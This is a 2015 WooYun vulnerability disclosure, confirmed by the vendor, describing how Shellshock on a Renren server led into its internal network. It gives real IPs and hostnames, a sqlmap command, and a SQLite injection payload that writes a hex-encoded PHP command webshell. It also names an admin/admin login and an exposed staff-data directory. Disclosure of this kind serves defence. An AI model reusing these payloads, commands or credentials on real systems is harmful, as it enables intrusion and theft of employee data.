当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0128132

漏洞标题:人人网某业务命令执行导致内网沦陷引发的一系列安全问题

相关厂商:人人网

漏洞作者: redrain有节操

提交时间:2015-07-21 15:32

修复时间:2015-09-04 16:30

公开时间:2015-09-04 16:30

漏洞类型:命令执行

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-07-21: 细节已通知厂商并且等待厂商处理中
2015-07-21: 厂商已经确认,细节仅向厂商公开
2015-07-31: 细节向核心白帽子及相关领域专家公开
2015-08-10: 细节向普通白帽子公开
2015-08-20: 细节向实习白帽子公开
2015-09-04: 细节向公众公开

简要描述:

(审核同学麻烦帮上传下外部图床的图片,我无法在乌云上上传图片)
17号开了乌云峰会,boooooom的议题讲内网的,其实并不是特别具有普遍性,只是进入内网的一个切入点,大部分企业的内网安全问题依然是攻击者从外围业务打开缺口
全线业务代码泄漏,全体员工信息泄漏,可能影响用户数据,内部门户getshell,且已发现被入侵痕迹

详细说明:

target:http://118.186.217.122/
存在shellshock:http://118.186.217.122/cgi-bin/test-cgi
简单getshell后开始收集信息

屏幕快照 2015-07-21 下午2.27.20.png


确认主机在内网
查看hosts确认其他网段
10.4.24.0/24
10.3.17.0/24
10.3.16.0/24
10.3.23.0/24
10.5.16.0/24
其中
10.22.160.0/24
10.22.198.0/24
是数据段
10.7.2.0/24
10.2.10.0/24
10.2.15.0/24
是内部业务段
常规的代理流量进入内网探测性扫描
http://10.4.24.136/source/ 应该是对方的代码托管平台,基本上全线业务都在上面且没有认证即可查看下载,导致全线业务代码泄漏
<img src="http://m1.yea.im/1pA.png" alt="" />
<img src="http://m1.yea.im/1pB.png" alt="" />

mail.renren-inc.com	10.7.2.18
meeting.renren-inc.com 10.2.10.23
library.renren-inc.com 10.2.10.24
we.renren-inc.com 10.2.15.80
soft.opi-corp.com 10.2.15.42
renren-inc.com 10.7.2.12


根据之前的扫描结果,直接对内部业务段进行渗透
we.renren-inc.com/tongxunlu/
应用存在注入,sqlite的数据库,影响全体员工数据

proxychains -q sqlmap -u "http://we.renren-inc.com/tongxunlu/addressListNote.php?id=1027*"


可getshell,然而有个坑点需要编码处理

;ATTACH+DATABASE 'ztz.php' AS lol; CREATE TABLE lol.pwn (dataz text); INSERT INTO lol.pwn (dataz) VALUES (X'3c3f7068702073797374656d28245f524551554553545b615d293b203f3e');--


如此,可getshell
<img src="http://m1.yea.im/1pE.png" alt="" />
在此之前已有其他黑客入侵,请自查
<img src="http://m1.yea.im/1pF.png" alt="" />
其他还有诸如目录遍历,内部业务后台弱口令等等
http://we.renren-inc.com/tongxunlu/admin
admin/admin
http://we.renren-inc.com/tongxunlu/App_Data/
可直接下载所有员工数据
正要深入用户数据和办公段渗透时,外部业务下线了,但是全盘渗透仅仅只是时间问题,不再做敏感攻击

漏洞证明:

屏幕快照 2015-07-21 下午2.27.20.png


<img src="http://m1.yea.im/1pA.png" alt="" />
<img src="http://m1.yea.im/1pB.png" alt="" />
<img src="http://m1.yea.im/1pE.png" alt="" />
<img src="http://m1.yea.im/1pF.png" alt="" />
乌云图床有问题。。。剩下的传不上去图片。。。

修复方案:

人人应该被很多人都日穿过了吧,这个shell是好几个月前的了,一直存活到7月,安全部门应该定期进行自检
内部业务相对脆弱,但是基本的开发安全习惯应该养成
内网权限划分太差,流量无论是哪个网段都能通常

版权声明:转载请注明来源 redrain有节操@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-07-21 16:29

厂商回复:

这边遗漏的坑太多,我们在不断踩坑埋坑,望大牛多多监督哈!

最新状态:

暂无


漏洞评价:

评论

  1. 2015-07-21 15:33 | 玉林嘎 ( 普通白帽子 | Rank:758 漏洞数:96 )

    前排!

  2. 2015-07-21 15:41 | answer ( 普通白帽子 | Rank:347 漏洞数:45 | 答案)

    后排

  3. 2015-07-21 15:44 | 茜茜公主 ( 普通白帽子 | Rank:2360 漏洞数:406 | 家里二宝出生,这几个月忙着把屎把尿...忒...)

    大后排

  4. 2015-07-21 15:45 | Gowabby ( 路人 | Rank:6 漏洞数:3 | SB一个,求大神带,求大神指导,求大神丢肥...)

    大大后排

  5. 2015-07-21 16:14 | _Thorns ( 普通白帽子 | Rank:882 漏洞数:157 | 收wb 1:5 无限量收 [平台担保]))

    大大大后排

  6. 2015-07-21 16:33 | Hero ( 普通白帽子 | Rank:116 漏洞数:31 | 药药切克闹,充气娃娃迷幻药)

    大大大大后排

  7. 2015-07-21 16:44 | DloveJ ( 普通白帽子 | Rank:1107 漏洞数:200 | <a href=javascrip:alert('xss')>s</a> 点...)

    大大大大大后排

  8. 2015-07-21 17:52 | Smilent ( 实习白帽子 | Rank:34 漏洞数:6 | None)

    大大大大大大后排

  9. 2015-07-21 22:18 | white hat ( 实习白帽子 | Rank:40 漏洞数:17 | 没有网络安全就没有国家安全,没有信息化就...)

    大大大大大大大后排

  10. 2015-07-22 08:45 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

    大大大大大大大大后排

  11. 2015-07-26 17:19 | Me_Fortune ( 普通白帽子 | Rank:209 漏洞数:71 | I'm Me_Fortune)

    大大大大大大大大大后排

  12. 2015-07-29 23:45 | jianFen ( 普通白帽子 | Rank:530 漏洞数:83 | 避其锋芒,剑走偏锋)

    大大大大大大大大大大后排

  13. 2015-09-04 20:09 | 这只猪 ( 路人 | Rank:5 漏洞数:2 | 南无阿弥陀佛!)

    膜拜黑客们!

  14. 2015-09-04 22:47 | V-King ( 实习白帽子 | Rank:31 漏洞数:7 | 我是静静)

    这么说,裤子又呗脱了?